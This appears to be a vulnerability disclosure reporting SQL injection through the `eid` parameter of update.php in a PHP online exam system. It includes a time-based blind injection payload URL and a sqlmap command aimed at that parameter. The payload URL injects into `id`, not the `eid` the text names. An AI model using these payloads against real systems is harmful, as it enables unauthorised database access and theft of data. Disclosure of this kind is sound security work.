# code-projects online-exam-mastering-system-php has sql injection in update.php ## supplier https://code-projects.org/online-exam-mastering-system-php/ ## describe In update.php, ### Code analysis  The SQL Injection vulnerability here exists because the value of `$_GET['eid']` is directly embedded into the SQL queries without any validation or sanitization. If an attacker inputs malicious SQL code as the `eid` parameter, it will be executed by the database. For example, if `eid` is set to `'1' OR '1'='1'`, it could manipulate the query to return or modify unintended data. Always use **prepared statements** or **parameterized queries** to prevent this. ## payload ``` http://host/update.php?q=quiz&step=2&id=5589741f9ed52' AND (SELECT 1435 FROM (SELECT(SLEEP(5)))LDIH) AND 'IBid'-'IBid&n=1&t=5&qid=5589751a63091 ``` ## exploit use sqlmap to attack ``` sqlmap -u "http://host/update.php?q=quiz&step=2&eid=5589741f9ed52&n=1&t=5&qid=5589751a63091" -p eid --batch ```